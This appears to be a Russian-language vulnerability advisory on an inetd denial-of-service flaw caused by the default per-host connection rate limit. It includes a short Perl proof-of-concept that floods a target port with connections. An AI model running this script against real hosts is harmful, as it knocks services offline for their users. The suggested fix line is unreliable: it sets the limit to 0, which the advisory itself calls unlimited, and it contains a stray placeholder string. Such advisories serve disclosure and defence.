| Дата публикации: | 07.09.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1531 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
Уязвимые версии: InetD (Internet Services Daemon) Описание: Уязвимость обнаружена в Internet Services Daemon. В конфигурации по умолчанию на большинстве FreeBSD/linux инсталляций, удаленный пользователь может завесить работу службы, используя уязвимость, обнаруженную более 11 лет назад. InetD использует опцию: -R rateКоторая определяет максимальное число подключений с одного хоста в течение минуты. Значение по умолчанию – 256. Значение 0 означает, что число подключений неограниченно. Атакующий, способный установить более 256 подключений в течение минуты (зависит от его пропускной способности), может нарушить работу службы в течение следующих 10 минут. Если атакующий завершит подключение перед восстановлением работы службы, то его нападение не будет зарегистрировано. Пример/Эксплоит:
#!/usr/bin/perl
use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host); $padr=sockaddr_in($port,$iadr); for($i=0; $i <
300; $i++) { socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(SOCK,$padr) or next;
close(SOCK);
}
print "\nDone\n";
Решение: Добавте следующую строку в inetd.conf файл:-R 0 -s your_ad_can_be_here |
|
| Ссылки: | 11 years of inetd default insecurity? |